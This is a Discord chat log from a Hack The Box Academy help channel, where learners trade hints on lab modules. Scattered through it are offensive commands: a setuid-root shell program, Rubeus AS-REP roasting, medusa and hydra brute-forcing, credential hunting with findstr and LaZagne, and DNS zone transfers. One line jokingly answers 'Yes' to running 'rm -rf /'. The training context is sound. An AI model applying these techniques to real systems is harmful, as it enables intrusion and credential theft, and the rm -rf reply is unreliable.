#modules

i think ill rest my brain for today, this module is difficult

Cracking Passwords with Hashcat

i think the next best route for me to upload a zip to a win machine will be to use webdav however the write for it in HTB is really confusing for me

the module would have taught smb transfers, which will be apporate for windows, http also works

desktop is spelled wrong. and that will only work if your current dir has the desktop folder in it.

i guess this is only a useful comment if you copy/pasted..

🙂 hope you figure it out!

it wasnt a copy/paste just a typo here

oh! @dire abyss for some reason i could never get scp to work from powershell.. in the instances ive had to use it on a windows OS .. ive always had to pop open an admin CMD prompt

i think im making it harder than it really is

try cmd

i was an admin for a 200k host enterprise . moving files from test machines to linux servers using scp ... cmd worked ... PS didnt

idk why

(P)iece of (S)hit

Hah

im sure the problem with SCP here is that port 22 is closed and openssh isnt active on the machine

nah

Well, that'll do it

ive used 21 and 23 before with scp

Openssh isn't running

ahh ... openssh ..

yeah

yeah

Is the other key part of that phrase LMAO

i literally quick scanned " im sure ... problem ... port 22..."

this one is pure pain for me lol

i believe it!

We're hackers, we can't r34d

yeah like was said earlier. you cant have a tool magically work if the service it uses isnt running

But try other file transfer methods

thats computers 101

bu bu but... c0mpu70r5 do what i say they do...

https://tenor.com/view/nasty-gross-yuck-throw-up-disgusts-gif-16291452

whys my vmware machine have no internet

because thats cheating lol

huh

the network connection was working up until today?

i need internet to connect to htb?

oh nvm i thought you were talking about the module i was on

oh no my shits just wonky

thats a good sign you could use a nap though

How would I find the name of a hidden file within directory. Tried -ls, -ls -la

ls -la

Tried that

but it shows 32 but not sure how to see the rest, only see 8 at a time

You might be able to pipe it to less

What question and module are you working on?

What is the name of the hidden "history" file in the htb-user's home directory?
What is the index number of the "sudoers" file in the "/etc" directory?

Step1: make sure you're ssh into the target
Also with ls you can specify a file with ls

I tried -ls /history

Nope

"Htb-user's home directory"

I first tried

cd /home/htb-student

You don't need to specify anything if you're in the home (~)

oh

ls -la from the htb-student home directory will give you the answer

For the second question "index" is the keyword- man ls and look for "index" and use that flag

ls [flag] /etc/sudoers

cant get the first one lol

Then let me ask you: are you connected to the target 10.129.x.x

I get
.
..
bash_history
bash_logout
Bashrc
cache
gnupg
profile

Hmm one of those looks correct

I thought cache or gnupg

but I entered both

youre looking for the history file

(You need to put the . In front of it)

^

Reading the question is also helpful

I forgot the dot -_-

really.

The . in filesystems indicates that it's "hidden"

ls -a

will reveal hidden files
maybe its a?
i use ll alias so i forget .. but essentially ls -lah will give you all good infos

h stands for human readable

but the ls sudoers /etc just shows a large list of files

Wrong order

ls /etc/sudoers

But that's not gonna give you the answer

You need a tag with it to tell you the index

Time to rtfm man ls

ls <path> <path> <path> <path> ls can list multiple paths

man is a linux command that opens a "manual" for a command

like a ls cat?

I got bored one day and did ls /*/*

List all the things

-R is one of my fav ls flags.

nothing in the list talks about "index"

Read carefully

ll -R /home/ | grep <for what ever you think you are looking for>

One of the flags lists the index number

It's in /etc/ not home

--inode?

Try it and see

sorry! I may be detracting from the learning occurring .. im just being social

in a nerdy way

There's also a shorthand

man ls Documentation is a beautiful thing

Rtfm in action is beautiful

ls --inode /etc/sudoers/

Not a directory

Don't add the / at the end

ahhh

theres no sub directories within the sudoers file

A / tells ls that you're continuing the directory chain

Thank you, I suppose I will use the "man" command more often, sorry about this simple question. I appreciate the time to help me!

It's alright

i love seeing the questions and the helpfulness

dont be sorry for asking questions!!

As you can see we were guiding you to get the answer yourself

Not just "here's the answer, don't ask how I figured it out"

Leading a horse to water methodology... or maybe teach a man to fish

And I appreciate that, It makes me still think, and figure it out. Teaching me rather than just telling me the answer and moving on. I love the support!

When in doubt man It out

now ... what to do when a man page doesnt exist ...

no manual entry for this command

--help me

Definately, I am also taking notes with a software called "Notion" trying to write down anything I am missing or might want to know later

I prefer obsidian

Note taking is so very important

It uses markdown, and you can backlink documents to each other

I looked at obsidian .. I am just using Gitlab

You can link obsidian to git 👀

yee

one day ill port my junk into obsidian

I actually like obsidian

Heres my note taking script ...

might aswell transfer now rather than later lol

#!/bin/bash

DATE=$(date +"%F")

#auto update git at every invocation
target_directory="/home/_rivace/Documents/vscode/Internal/"
original_directory=$(pwd)

cd $target_directory || exit

current_timestamp=$(date +"%H:%M")

commit_message="latest commit on timestamp ${current_timestamp}"

git add .

git commit -m "commit_message"

git push

code /home/_rivace/Documents/vscode/Internal/Stardate/Stardate-$DATE.md

cd $original_directory

I wouldn't advise that: obsidian is notoriously sharp

best part .. is you can invoke it from anywhere ..

:^)

and it auto pops a current date page for you to start fresh each turn of the date

invoking a second time same day just " saves progress"

I'd love to see your code projects if that's how you do notes

afaik .. only works if commiting as main

Documentation must be smooth

working on it.. im a hard-starter ..

I need to commit my python projects from automate the boring stuff there

i usually am more motivated to code when i have a problem to solve ..

Anyone have tips of how to stay consistent at jumping on HTB everyday and learning more and more?

in that case i needed a "journal "

And include a requirements for some of them

Like pyperclip

and .. thus the stardate note script was born

It's definitely a lot about drive. How excited are you to (likely) be frustrated by learning something new

I love fucking up while I learn

hahah

If I fuck up while learning, less likely to do it outside that context

I really want to learn more and know more about everything to do with tech. Sometimes I feel "Burnt out" after working 55 hours a week and then full time school on top of that

i think that might be what im missing ...

ill think about a problem .. and think about it .. and iterate in my head ( mental space ) ... and i find it hard to execute until i identify the path to a possible success ...

But I really want to become the best I can and do more than just the average person

55 hr work + school (I'm assuming at least 20 hours a week or about that) leaves little for yourself

The less you compare yourself to others, the better you can focus on yourself.

I like to do a little comparison as a motivation to push further

Be willing to fail. Someone else has fucked up on the same step you have

I agree, Thats why I just try to keep going without comparing myself to others. Because the more time you spend comparing youself, the more you lose focus on what really you want

Compare yourself to how you were a year ago, do that once a month and by next year - you can laugh about not knowing the basics yet

Thank you again for everything I appreciate it all. I guess now onto the next challenge!

never ending challenges ... higher and higher steps to climb!

Be willing as well to re-prioritize things

Shmoney and education are important

So taking a day or two off to focus on the priorities lets the back of your mind soak in stuff you just learned

Also tbh learning how to learn is hard

Especially if you grew up in an education system that penalized asking questions (America)

Or questioning the authority to understand more

Also be willing to accept "yep, it really is that dumb"

A lot of the people apologizing about asking questions never had a chance to properly voice their confusion

Also something that's a big thing is writing notes in a way that you understand

If you have to reword it in a dumb way to help you understand then who cares

When I take notes, I read the description of something and rewrite it to where I can fully understand what it does, rather than copy and paste what the page or book says

That's good

Hell the first time I learned to utilize ls I broke it down as "list stuff"

But I'm also fairly decent at breaking down knowledge to the little details to expand on

Thats good

I could be entirely quiet in this channel and just go through content and only ask for help. (And that's fine) but the major reason I contribute here, is to reinforce and expand my knowledge

teaching help solidify it for yourself

Even if it's a module I haven't done yet, and I only know some bits from what I know

i moonlight as a bootcamp instructor for cybersecurity 🙂

Like a lot of web stuff I know sweet F.A. about

gross

bootcamps suck lol

Lol

Thats what I hope to do too once I get a bigger understanding of it all. That is what I do in my college Cyber Club. When we do CTF. I am one of the few people that understand a lot of it. So I teach and that honestly helps with what I learned because sometimes someone else has a easier way than the way I did it

Mhm

I also have learned how to reword my explanations

I will throw in the occasional "skill issue" here or there, but it's mostly playful jabs

You just have to have patience, not just with the tools - but with yourself. Haste makes waste, waste makes frustration

"I swear I tried 'x' method and it didn't work"

Yeah, Sometimes I step away for a minute, come back and retry with a refreshed mind

https://tenor.com/view/cymbals-monkey-brain-the-simpsons-homer-empty-head-gif-15689692

Literally me most of the time

The only time I'm really aggressive about it is when someone is being pedantic when it doesn't matter

Like 99% of the userbase calls it this, so we treat it/generally refer to as this

A lot of common convention is convenience

Yeah True

Why is http(s) 80(443)? Who the fuck knows at this point: everyone uses it now

Just used that man command lol. Helped me out to figure out how to sort the files as last modified

Golden star please 😂

some do!! I work for the MIT brainchild .. EdX

It's super useful until it isn't

😂 For now I am glad its helpful

guys where do i ask for linux support

havnt heard of that one yet. Bootcamps are very frequently just a meme with horror stories of people shelling out 16k not knowing nmap getting no certs and employers laughing at them

Like generic linux support? You might have luck in #1024429874246590575

My buddy at work is doing cybersecurity bootcamps and he doesn't even know how a switch works or VLANS lol

Some OS have their own discord and forums

Eh you don't necessarily need to know those things

True but that was the easiest way of me explaining the level of how Tech savy he is. I know Cyber is not just a Switch. I just didn't have a example on top of my head

It's also very wiiiiide

I vaguely know how a switch works conceptually

this one is a 3rd party facilitator partnering with and getting cirriculum approval through Universities such as Arizona State University, and Uni. So. Cal.

Anyone familiar with the MSSQL page of footprinting? Having trouble finding the hostname using nmap

Hey can anyone help me with the password attack hard lab ... I just need a nudge about what word list to use at this point I used up rockyou.txt mut_pass.list made from custom rule and also password.list given in resources for the user johanna for initial foothold

is he in the middle of the cohort? learning occurrs at different paces depending on the person. maybe ask him again after the cohort ends 😉
OSI model is a big emphasis with the better bootcamps.

Will do!

I think I am missing something but not sure

What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?

I typed - find / -type f -name *.conf -size -28k -size +25k -newermt 2020-03-03

-size is weird

In general

hmmm

would the locate command be better for this?

whats your output?

No, find is fine

i know you can sort by file size... id do that and just eyeball it .. but i like to make it difficult for myself

many lines saying "access denied"

ahh

2>/dev/null

look for something to filter those in the module :)

or just type what marcie said

There is a section that goes over it

Anyone know why my nmap scripts are all reporting errors?

yeah but i js checked and 2>/dev/null is in the module and its good for him to learn how to find solutions himself

Thats what I was missing at the end

Everything else was right

Trying to run --script ms-sql-info but I'm getting "ERROR: Script execution failed", anyone have any thoughts?

The script failed to execute.

Except that, and I didnt add that since it didn't really explain it in this section, it stated will be learning more about what this done in the future

Yeah a lot of the sections in linux Fundamentals are out of order

2>/dev/null This is a STDERR redirection to the 'null device', which we will come back to in the next section. This redirection ensures that no errors are displayed in the terminal. This redirection must not be an option of the 'find' command.

thats in the module though

Or at least not as clear as they could be

It might be in a later section is the point lol

guess I just read it wrong

It might not be in a section they've already done

yeaahh but it says that it ensures no errors are in output

thats the section with the question he asked

Ahhh ok

i opened it jn

Then yeah

2> redirects stderr

2 is the number for errors, the rest just redirects it to a place that basically gets rid of it

You can actually output it to a file like error.txt and it'll do just the same

thats all he needs to understand rn

sorry marcie i know u understand more than me

refreshing my memory is all

Nah you're good

exit codes yea?

should i just make a new vm for the internet issue?

Nah just standard terminal stuff

ah ok

Stderr and stdout are the common ones

(By default any redirect is stdout)

I've been doing this question and realized I was in the wrong directory the whole time lol

the small things sometimes

https://tenor.com/view/been-there-did-that-i-understand-same-colt-bennet-gif-15067891

When you :q! Instead of :wq

@fathom pendant any thoughts on issue I'm having with MSSQL enumeration? You were able to help me yesterday (which I forgot to thank you cause I was cranky, thank you again)

if you ever need help with the linux fundementals section, im a bit ahead of you in it so you can ping me if you'd like

What module?

I'm in Footprinting on the MSSQL page

b-b-b-b-bu-bu-but ... thats what i do every time... What do youmean you dont want to be warnned your about to do something stupid...

I dont recall having too many issues with it

So I am doing the full path of the xxd binary, I know this is not the right command but I am not sure what the extension would be for a file like that.

find / -type f -name *xxd 2>/dev/null

I'm running the nmap command but I'm get errors when I run the scripts

Could be a version issue or something ik some versions Nmap scripts borked

Use GET request '/index.php?id=0' to search for the name of the user with id number 1?

-sC ?

How would I aproach this where would I put the Get request?

-name xxd iirc

be in a REST API env in the server

no *.

?

ftp is a common one

so find / -type f -name xxd iirc 2>/dev/null

Get request ip/index.php?id=1

if it doesnt work do -name "xxd"

GET request 'IP/index.php?id=0' So something like this in the broswer URL?

How does it show you in the section?

Use GET request '/index.php?id=0' to search for the name of the user with id number 1?

This is the question

I have the target ip

I tried something different

I did
"which xxd"

that will give you the bin or sbin where the binaries of the package are located

did it work?

it did

good job !!

Thank you!

Well the section should at least demonstrate what it wants or a previous section

I'm on module/75/section/762

Module numbers mean nothing to me

I figured it out xD

The actual name helps

😄

Yep

I did this and it worked gave me the answer

That sounds right at least for a standard web request

Those are generally get

Before asking "is it x", you should try it

That way you can say "I tried x and that didn't work"

is it ok to run rm -rf /

Yes

🗿

That's by far the most overused thing

help I can't boot I have to type this on my phone.

Skill issue

@fathom pendant can you help me with #modules message

Should be able to with mut_passwords you might need to add --local-auth

Or whatever it is in hydra/cme

then why did you yesterday showed me the way towards generic wordlist ??

memory on exact details is fuzzy my guy ¯_(ツ)_/¯

I haven't touched it in ages

This whole HTB thing is a lot more structured than TryHackMe...

Seems a bit more professional too

I agree

That's kinda the point

The authors are well known people in the field that have broken them down in a structured way

On the gold annual subscription blog post by HTB

One exam voucher, worth $318 if purchased separately and providing two attempts.

Does this mean that's the price for the new voucher. Or does it mean that vouchers are going up in price?

If they're going up I'd want to buy them before that

Yeah, I did wonder about that. Since it's their first advanced certification and the previous three were considered intermediate. That would only be the price for the CWEE voucher is my guess.

Imagine getting gold annual for the lower level certs lol.

morning!

what is the CWEE?

new cert

advanced web, black box

Hi. Can anyone help me with a doubt in the privesc part of the Getting Started module?

sure thing

DM?

no

here

I got read access to the ssh key but I couldn't understand how since the permissions show root:root for id_rsa. Is it because of the other part of permissions?

Well yes, root:root just means the owner of the file, if you look at the permission bits, it has 3 'r' meaning that anyone in the system can read that file.

Got it. Just needed that confirmation haha

remember owner-group-others

rwx-rwx-rwx

sometimes I want those easy permissions on Windows im working with InTune and its so fkn difficult

@slender shoal RBAC with InTune is not easy !

Very afraid of touching windows haha. Really hate that it is not as transparent to understand

Yes, but it has its advantages. You have way better granular control. And after that Windows is the king of Enterprise enviroments so it is what it is haha

necessary evil

There will be a senior advanced web cert after ? I Ask because it miss openID in the oauth section, or the csrf... And an intro to nosql for a senior web pentester xD

UNDERSTANDING LOG SOURCES & INVESTIGATING WITH SPLUNK
Introduction to Splunk & SPL
https://academy.hackthebox.com/module/218/section/2356

Question 3:
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.

I got the correct answer, but I'm not really understanding what I'm missing here. I see that the hint mentions ||to use the "range() function"|| However, I'm not getting the correct results. My answer still shows the wrong user with the number of login attempts within the span of 10minutes. I think my issue is that I'm not using the ||range|| function, but I'm not really tracking on how to use it.

anyone has done this ? I think i am in the right track but it is not working.
EDIT: solved, i hate when some attacks take so long

https://academy.hackthebox.com/module/147/section/1323
How am I supposed to gain access to this

I have the password from the previous but is there something I am missing?
Are we supposed to log into it via ssh or some other protocol

ayo anyone done with password attack module am kind a stuck in Credential Hunting in Windows

Tbh I’m not a fan of that question or I don’t understand it myself. From the solution with range() that I have seen the only reason you can see the correct answer is because it is the only account where the first and last recorded login are within 10m, so you can filter all the other ones out by that criterion

the first question is idk i cant find the ssh pass when i did findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml there are ell alotta files containing pass

so any idead how to find this pass ?

Right, I just dont quite understand that function and how its used. I was also reading the splunk docs and see what it does but I dont understand how to use it.

yes iirc or ftp

ig i exploited it with somthingblue

there's a couple different things you CAN try

DM me?

i used lazagne.exe all BUT THE creds i got was non but just shit i got some hashes which i tried to crack em with hashcat and still all shit non was there and the wordlist i used was rockyou

Range really is just the max value minus the min value of a aggregated group

Right.

any idea ?

instead of just asking do

i don't recall how i did it

i don't recall it being that difficult

i just kinda mostly did what the section showed

it is not tbh

sorry i thought you were the person asking something else

np

idk i think am missing smth and it sucks

that things you CAN try was aimed at the person asking about logging in with kira

idk man i haven't done this module in a minute so can't help ya too much

like I said it wasn't particularly hard i think i just looked around and found something

ok

idk what format it expects

Dont post spoilers. 🙂

now

Hey guys any tips regarding file tranfer module " Download the file flag.txt from the web root using wget from the Pwnbox. Submit the contents of the file as your answer."

maybe host a python webserver
edit: i think to download "FROM" pwnbox, you can just use wget url to download

What was your question again?

and what have you tried?

i think i know the url but it doesnt accept it

i did all other ones and got revshell

Whats the module and section

attacking common applications skills assessment 2

You can DM me.

Hey there. I am very stuck on a module. The rest is fine, but the dns one is killing me. I am stuck on the following question: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

This is the module Attacking Common Services | DNS

anyone that could give me a hand here?

dig for ever

i understand that. But i cant seem to get it

look for subdomains that have their record as 127.0.0.1 and then dig again

hint: you need to axfr transfer from one of the servers

you can still query doing dig axfr subdomain.inlanefreight.htb @ip

└─$ dig ns @10.129.148.222 inlanefreight.htb                  

; <<>> DiG 9.19.17-2~kali1-Kali <<>> ns @10.129.148.222 inlanefreight.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 43430
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 2
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 3d0b0db70d6abfac010000006583ec252832d4d4a79ade84 (good)
;; QUESTION SECTION:
;inlanefreight.htb.        IN    NS

;; ANSWER SECTION:
inlanefreight.htb.    604800    IN    NS    ns.inlanefreight.htb.

;; ADDITIONAL SECTION:
ns.inlanefreight.htb.    604800    IN    A    127.0.0.1

;; Query time: 104 msec
;; SERVER: 10.129.148.222#53(10.129.148.222) (UDP)
;; WHEN: Thu Dec 21 02:41:24 EST 2023
;; MSG SIZE  rcvd: 107

this right?

ns.inlanefreight.htb. 604800 IN A 127.0.0.1

axfr

no

bruteforce using subbrute then you will find something

i specifically said axfr for a reason

nah subbrute isn't needed for this question

idk thats how i did it

that might be how you did it

but it's not needed for this question

okay

yes, but i've tried axfr on all the subdomains i've found using subbrute and it shows the same response

└─$ dig axfr @10.129.148.222 inlanefreight.htb

; <<>> DiG 9.19.17-2~kali1-Kali <<>> axfr @10.129.148.222 inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

that's odd

oh wait yeah you do need subbrute i was thinking a different module

bruh

even the hint points at it

can i dm? i dont want to post the subdomains i've found related to a module

no

i hate rdp

its soooo laggy

once you find the subdomains it lists all you need to do is dig txt subdomain.inlanefreight.htb @ip iirc (you might need to do axfr)

dm me if you are still stuck after trying

tried so far all the subdomains i found with the following dig command: dig txt inlanefreight.htb @10.129.148.222

I dont really see anything interesting that is in the output.

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: cf63705f9e5069fc010000006583efb2bd92ce9a8505a86f (good)
;; QUESTION SECTION:
;inlanefreight.htb.        IN    TXT

;; AUTHORITY SECTION:
inlanefreight.htb.    604800    IN    SOA    inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800

;; Query time: 95 msec
;; SERVER: 10.129.148.222#53(10.129.148.222) (UDP)
;; WHEN: Thu Dec 21 02:56:34 EST 2023
;; MSG SIZE  rcvd: 115

ftp is empty entirely

try listing all

ls -R and ls -a both tried

weird

check the documents folder

in ssh

there is a file there

ssh also works

@quasi jungle

:P

use subbrute

are you digging the subdomain.inlanefreight.htb?

you do need to specify subdomain

otherwise all you've done is just query inlanefreight.htb a bunch

and not changing anything

i.e. www. or internal. or dev.

(note that may not be the actual subdomain for the answer, just an example)

Hey @fathom pendant I am just curious, do you plan on ever getting any of the certs?

life taking prio rn

gotta get that back on track prior to anything else atm

ah ok

hi, anyone here done the password attacks module?

yes i have. i just didnt include it here for spoilers reasons

tried all the subdomains i found

then you missed one iirc it's two letters

the resolver is correct right? The one i am using on subbrute? ns.inlanefreight.htb

hi I need help. I have been stuck in this for over a week. I doing the LINUX PRIVILEGE ESCALATION Logrotate. Everywhere i look it says that im supposed to use the ./logrotten to rotate it but it says that i dont havae logrotten on the machine and i cant clone it from github without sudo so i can really do anything here help!

resolver should be the IP

i have a small question about the linux credentials hunting in the password attacks module

the hint is wayyyy too far from the subject

like it feels undoable without the hint or requires A LOT of brute forcing

since by this point you should realize the linux boxes are all the same you can do some enumeration on the previous excersize to limit your users to those in /home/

well that

i already did the question

but like abt the hint

i think this make sense

he's referring to the fact that the user in question that you get the info with is unknown without a nudge

but not much 😂

the linux boxes are all connected/the same in the password attacks module

yeah when i went to the /home directory i was like " i saw these names before"

but i wasnt convinced that why would they place the SAME box

because ease of learning

yeah i see that now, thanks

(you should save kira's pw btw)

i save all passwords i get

good

same thing with the windows instances

those are all linked

also did 😂

the only ones that aren't linked (obviously) are the skill assessment labs

yeah i did think of that for some reason

yeah make sense

thanks for the help

it would lead to increased frustration if they made all the labs in the module completely different

when the purpose is to showcase password attacks and cracking

patience

¯_(ツ)_/¯

nice scam bro

<@&861185840277487616>

hi I need help. I have been stuck in this for over a week. I doing the LINUX PRIVILEGE ESCALATION Logrotate. Everywhere i look it says that im supposed to use the ./logrotten to rotate it but it says that i dont havae logrotten on the machine and i cant clone it from github without sudo so i can really do anything here help!

well the other problem you're gonna have is the fact that the target machines don't have internet access

step 1: download logrotten to your attack machine
step 2: transfer to target system

Module name Password attacks
Section name :Pass the Ticket (PtT) from Linux
Question : Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio im getting this error after exporting and running klist command : klist: No credentials cache found (filename: /root/krb5cc_647401106_yFQuNx)

Trying to crack a hash for a zip file but john shows 0g but it isn't the correct password

why are you looking in /root/ ?

that output from john shows that it's exhausted

try using the mutated wordlist

i copied to root or else it might get expired right? in /tmp

unnecessary

there's 2 ccache files for the user; one IS expired the other ISN'T

just because you change the directory it's in doesn't change it's expiration: that's on a different thing

I just relized this, but how do I transfet to the target?

refer back to the File Transfer module

there we go

i found the flag now

oh okay thanks

i thaught the resolver was the ns record

technically yes: but subbrute doesn't know that

thank you!

as .htb isn't a valid tld

it's not on any public DNS servers for it to query and ask

is there a way to check if zone transfers is possible? When not specifying the axfr in dig?

not really

zone transfer is kinda a "eh maybe it'll work" type deal

ah alr

thank you for the help 🙂

i mean what you can do instead of using subbrute is take the names list and do a for loop

that iterates through each until you get the right response

but THAT is a pain in the ass

:)

i dont what this error means : gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/dc01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
session setup failed: NT_STATUS_INVALID_PARAMETER
i exported ccahe and i verfied it using klist now when i try to acces dc01 using smbclient i get this

nt status invalid parameter - means that one of the things in the token is bad

¯_(ツ)_/¯

opps

https://unix.stackexchange.com/questions/533497/smbclient-throwing-error-nt-status-invalid-parameter-while-copying-large-files-f

googling seems to result in it's a version issue maybe

try specifying the smb version?

nah the ticket expired thats the iusse thanks anyways i sort it out

👍

<@&861185840277487616>

https://tenor.com/view/spongebob-how-many-times-do-we-need-to-teach-you-old-man-slow-thick-gif-12272188

hi im doing the LINUX PRIVILEGE ESCALATION Logrotate still and i have transfered logrotten to the machine. but when i create the payload and then just echo something in the access.log i create a new one ofc but when i add the payload i dont the the ncat connection back i dont get it

help

root@linux01:/home#|| kinit linux01@INLANEFREIGHT.HTB -k -t /var/lib/sss/db/ccache_INLANEFREIGHT.HTB||
kinit: Pre-authentication failed: Unsupported key table format version number while getting initial credentials. can i get any hint on this ?

Has anyone done the Enterprise Network module in the last while? I'm trying to Escalate my Privileges the exact same way as the section says but I never get the shell on the netcat listener running on MS01.

i found the flag.

Module name: PASSWORD ATTACKS
Section: Attacking LSASS
Question: Apply the concepts taught in this section to obtain the password to the Vendor user account on the target. Submit the clear-text password as the answer. (Format: Case sensitive)

I found the right password hash, but I can't decrypt it, I used all the dictionaries I had (sorry for the mistakes in the text, I used a translator).

might want to use rockyou for that, your wordlist seems quite short

I've already used it, it didn't work.

just use the resources password.list - perform mutation on it with custom rules

oh wait it's password attacks, yes use the mutated list

I tried that one, too.

yep 94k list

you sure?

I'll check again.

the hash is right, the mutated list should do it

doesn't work

then hash might be wrong

no the hash is right, but the pass is not in the mutated list

ah okay use rockyou + onerule

ok

It worked, thank you

Can anyone assist with the SysAx PrivEsc in Attacking Enterprise Networks, I can't get it to work

follow the steps in the exploit db entry, that's all you need

And that is what I did, the task is just never triggered

In Password Attacks Lab - Hard
i got johanna password for rdp then i found keepass i cracked it:||Qwerty7!|| but i cannot login through smbclient as dxxxx
i checked md5hash after and before encode and copying login.kdbx

Would you be willing to look at what I am doing?

i think you are speaking about another exercise

I really don't have more information than what's in the exploit db entry, if you follow the steps you should get it

its just that it seems like the task is never executed, like no log is even created

Module: Attack Common Apps Section:Wordpress Discovery --- Cant get the exploit working :WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution -- actually managed to do it manually but also want to use this exploit -- can someone help me to get if work?

Hello I have a problem with exercice : Module XSS phishing

Can you help me plz?

Actually managed it. Had some typos int the exploit -- doesnt the exploits published on exploidb get reviewed? -- just wondering?

Can just anybody uplaod an exploit?

Module: Password Attacks Section: Password Mutations

I have been trying the bruteforce task for the sam users password. I've followed the instructions using the password.list file and the custom.rule included and the best64.rule which is part of hashcat. I have cut the password files down to 1k each and modified them so they only contain passwords 8-10 characters long but nothing seems to work.

It was also suggested to use ftp as its quicker than ssh for the bf but that has not returned any positive result either.

Is anyone able to please give me some guidance how to solve this?

I succed for receive my access but it is not for succeed identifier login in the page login.php

@dreamy solar Did you receive creds from phishing link?

no but I don't know why...

I search forum info etc... I don't find

Maybe you xss payload is not correct for phishing?

Managed to solve it with and xss polyglot from payload all the things and adapted it accordingly

I don't understand am I supposed to wait? I retrieved the identifiers, I followed the course tutorial, everything is correct, I don't see where it's blocking

When are user IDs supposed to be displayed?

the simple payload is succeed it is just this that not okay and 0 informations

I compared it with a person who had successfully completed the exercise, strangely nothing changed in my approach.

why are you sure your payload is correct - guess if it would be you would get the creds

because my colleague has the same as me and it works ^^"

So your php file must be correct, otherwise you wouldnt get your own creds

Yes

So then it has to be the payload

Did you url encode the payload?

yes

managed to solve it with following polyglot:

I learn what is a Polyglot xss ? plz

dont know exactly but some kind of tricking the application in multiple ways executing for example js

or in term of programming a payload which can be interpreted by multiple languages at the sam time

but im not sure if its supposed to be solved this way -- nevertheless it worked

oki thanks I test

Hi im on the module linux privalge escaluation and i am on Miscellaneous Techniques. I succeed with transfering it and giving the shell.c the right uid but when i exacute it i dont become root. i wrote this in the shell.c "#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}"

it also says "-rwsr-xr-x 1 backupsvc logger 20184 Dec 21 15:41 shell"

in module: broken authentication predictable reset token question1, can someone give me a nudge, look at my code? OMG nevermind i got it...tnx for not answering me yet lol

Im in attacking common services module -> attacking ftp section, on the second question of the exercise here. ||I connected annonymously to the ftp, got the pass and user list and try to brute force it using medusa. It has 11 potential users and 250 passwords. It is taking ages to brute force it, because the ftp has some login lag (even though I'm trying from pwnbox). The command I run: medusa -h $IP -U users.list -P passwords.list -M ftp -n2121|| Is there any way to speed it up?

I am working on the ad enumeration skill assessment 1 - i uploaded rubeus to the webshell, but how can i run it if i cannot cd to that directory? I am trying to get the password for the ||svc_sql|| user

I am trying to run this ||.\Rubeus.exe asreproast /user:svc_sql /nowrap /format:hashcat||

if you're using hydra, set the number of threads -t 48

why can you not cd? anyways you can specify absolute path

I bruteforced the second question of which user is available because it only had 11 options, then used this user in hydra to bruteforce the ssh login. It would take hours with medusa and hydra

if the section is about ftp shouldn't you brute ftp

Hello, I would like to know if i do something wrong because should i see the flag.

introduction windows command line - Skills assessment

@next bronze I tried to cd in the web here /uploads/antak.aspx, but it just stays in current directory

use absolute path

looks like the file is empty, are you sure that's the right file?

@next bronze this is the name of the file 0 flag.txt

if the file is empty then it's probably elsewhere

Module: AD enumeration & attacks, Section: Skills Assessment Part 2

I got a revshell on SQL01 as nt service\mssql$sqlexpress, but I don't know where to look for PE to the Administrator account.

Is anyone able to please give me some guidance on how to proceed ?

@next bronze Ok

try cat flag.txt

@sharp nexus 'cat' is not recognized as an internal or external command,
operable program or batch file.

rip

of course, that's the command prompt, not powershell, cat and ls don't work there

you right you right

Exact

forgor

you probably have to search for the flag in some way

type flag.txt ?

which question

Q7

did you try whoami /priv? it's a service account

for Broken Authentication "Using rockyou-50.txt as password wordlist and htbuser as the username, find the policy and filter out strings that don't respect it. What is the valid password for the htbuser account?" can someone DM me and give some sort of hint? Ive have been going back and forth with the policy and character classes for about 2 days now and nothing is hitting.

So i am trying to still figure out how to get rubeus to run if it gets upload to this spot...trying to get Q3 for the skills assessment of ad enumeration

you can find where it's uploaded then use absolute path, but I advice to upgrade to a better shell to make your life easier, webshells suck

so like nc or something right

i'll try that

Hi im on the module linux privalge escaluation and i am on Miscellaneous Techniques. I succeed with transfering it and giving the shell.c the right uid but when i exacute it i dont become root. i wrote this in the shell.c "#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}"
[3:47 PM]
it also says "-rwsr-xr-x 1 backupsvc logger 20184 Dec 21 15:41 shell"

Hey man, could you give us a hint! @supple gorge

@old atlas are you asking how to transfer files?

Use SCP... It explains in the following sections

Http-uri is close to the answer. Search up http keywords you can use

tyvm this was the way to go

anyone can help me with Web Attacks - Skills Assessment?

i can't execute xxe

Can someone give me a hand with getting a better webshell or executing an exe after uploading for the skill assessment 1 under ad enumeration?

i got it

CPTS path reporting template contains appendix "Exploited Hosts". Should it only include initial access? Or privilege escalation too? For example, draft example specifies MS01 2 times

Read the notes part: aside from that no one can answer that for you that's done the exam

"Alternate domain foothold"

Which indicates multiple levels of compromise not just the way initially accessed by the tester

This is also better to ask over in #cpts

hello y'all, anyone who can lemme know what can be wrong in this vHost fuzzing command : ffuf -t 250 -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://gitlab.inlanefreight.local:Port/ -H 'Host: FUZZ.gitlab.inlanefreight.local'..?

The draft is from reporting module, so I thought it should be asked here

Your question was more general towards the exam

It didn't sound like it was from a module

I'm asking cuz I'm stuck trying to fuzzing/enumerating the vHost in the skill assessment II from attack common app

I was mostly confused as to why the draft has specified the same host (MS01) 2 times

